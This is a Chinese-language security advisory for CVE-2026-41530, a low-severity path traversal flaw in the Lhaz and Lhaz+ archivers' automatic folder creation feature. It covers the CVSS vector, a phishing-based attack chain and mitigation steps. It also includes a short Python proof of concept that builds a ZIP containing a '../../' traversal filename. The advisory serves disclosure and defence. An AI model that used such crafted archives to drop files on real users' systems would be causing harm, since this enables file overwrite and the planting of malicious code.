CVE-2026-41530: Lhaz和Lhaz+自动创建文件夹功能路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-41530

漏洞类型

路径遍历

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Lhaz, Lhaz+

漏洞概述

Chitora soft公司开发的Lhaz及Lhaz+解压缩软件中存在一处路径遍历漏洞，该漏洞具体位于软件的“自动创建文件夹”功能模块中。当用户在软件设置中启用了该功能，并尝试解压一个经过特殊构造的压缩文件时，由于软件未能正确验证归档文件中的文件名，攻击者可以利用包含路径遍历字符（如“../”）的文件名将文件释放到系统中的任意目录。尽管该漏洞的CVSS评分为3.3（低危），且需要用户交互才能触发，但在特定场景下，攻击者可能利用此漏洞覆盖系统关键文件或植入恶意程序，从而对系统的完整性和可用性造成潜在威胁。

技术细节

该漏洞的根本原因在于Lhaz和Lhaz+在处理文件解压过程中的路径规范化逻辑存在缺陷。通常，解压软件会根据压缩包内的文件名在目标目录下创建对应的文件和文件夹。然而，该受影响的产品在启用“自动创建文件夹”功能时，未对文件名中包含的目录遍历序列（例如“../”或绝对路径字符）进行严格的过滤或安全检查。

在攻击场景中，攻击者首先需要制作一个恶意的压缩包（如ZIP或LHA格式）。在这个压缩包中，攻击者将恶意文件的文件名设置为包含遍历序列的形式，例如“../../../Windows/Temp/evil.exe”。随后，攻击者通过钓鱼邮件或其他社会工程学手段将此文件发送给目标用户。当用户使用受影响的Lhaz或Lhaz+版本解压该文件时，软件会解析文件名，错误地将路径穿透出原本设定的解压目录，并将文件写入到攻击者指定的位置。

从CVSS向量分析（AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N），该攻击属于本地攻击，利用复杂度低，无需权限但需要用户交互。虽然机密性未受直接影响，但完整性受到低程度影响。攻击者可能利用这一点覆盖用户配置文件或执行其他操作，危害程度取决于解压软件运行时的用户权限上下文。

攻击链分析

STEP 1

步骤1：漏洞利用准备

攻击者利用Python或其他工具构造一个特制的压缩包（如ZIP），其中包含带有路径遍历字符（例如“../../evil.txt”）的文件名。

STEP 2

步骤2：投递恶意文件

攻击者将构造好的压缩包通过网络钓鱼、邮件附件或物理介质发送给目标用户。

STEP 3

步骤3：诱导用户解压

攻击者诱导目标用户下载并使用Lhaz或Lhaz+软件打开该压缩包，并执行解压操作。此时必须满足“自动创建文件夹”功能已开启的条件。

STEP 4

步骤4：执行路径遍历

Lhaz软件在解压过程中，由于未正确过滤文件名中的特殊字符，将文件写入到解压目录之外的指定位置，可能导致文件覆盖或恶意代码落地。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import zipfile
import os

# Create a malicious ZIP file to demonstrate the path traversal
# This script creates a zip file containing a file that tries to escape the extraction folder.

def create_malicious_zip(filename, malicious_filename):
    """
    Creates a zip file with a file that has a path traversal name.
    """
    with zipfile.ZipFile(filename, 'w') as zf:
        # The file name contains '../' to traverse directories
        zf.writestr(malicious_filename, b'This is a malicious payload content.')
    print(f"Created malicious zip file: {filename}")
    print(f"Inside file name: {malicious_filename}")

if __name__ == "__main__":
    # Example payload file name that attempts to write to the parent directory
    payload_name = "../../malicious_payload.txt"
    output_zip = "exploit_cve_2026_41530.zip"
    
    create_malicious_zip(output_zip, payload_name)
    
    # Instructions:
    # 1. Run this script to generate 'exploit_cve_2026_41530.zip'.
    # 2. Open Lhaz or Lhaz+ with 'Automatic Folder Creation' enabled.
    # 3. Extract the generated zip file.
    # 4. Observe that 'malicious_payload.txt' is created outside the extraction folder.

影响范围

Lhaz (受影响版本)

Lhaz+ (受影响版本)

防御指南

临时缓解措施

建议用户立即检查Lhaz及Lhaz+的设置，关闭“自动创建文件夹”选项以缓解此漏洞风险。同时，在处理任何外部来源的压缩文件时，应保持警惕，可以先查看压缩包内的文件列表，确认文件名不包含“../”等异常路径字符后再进行解压。等待官方发布安全更新后，应尽快进行安装。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-41530
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-41530
3 Details https://www.cvedetails.com/cve/CVE-2026-41530/
4 VulDB https://vuldb.com/cve/CVE-2026-41530
5 Link https://jvn.jp/en/jp/JVN68350834/
6 Link https://www.chitora.com/jvn68350834.html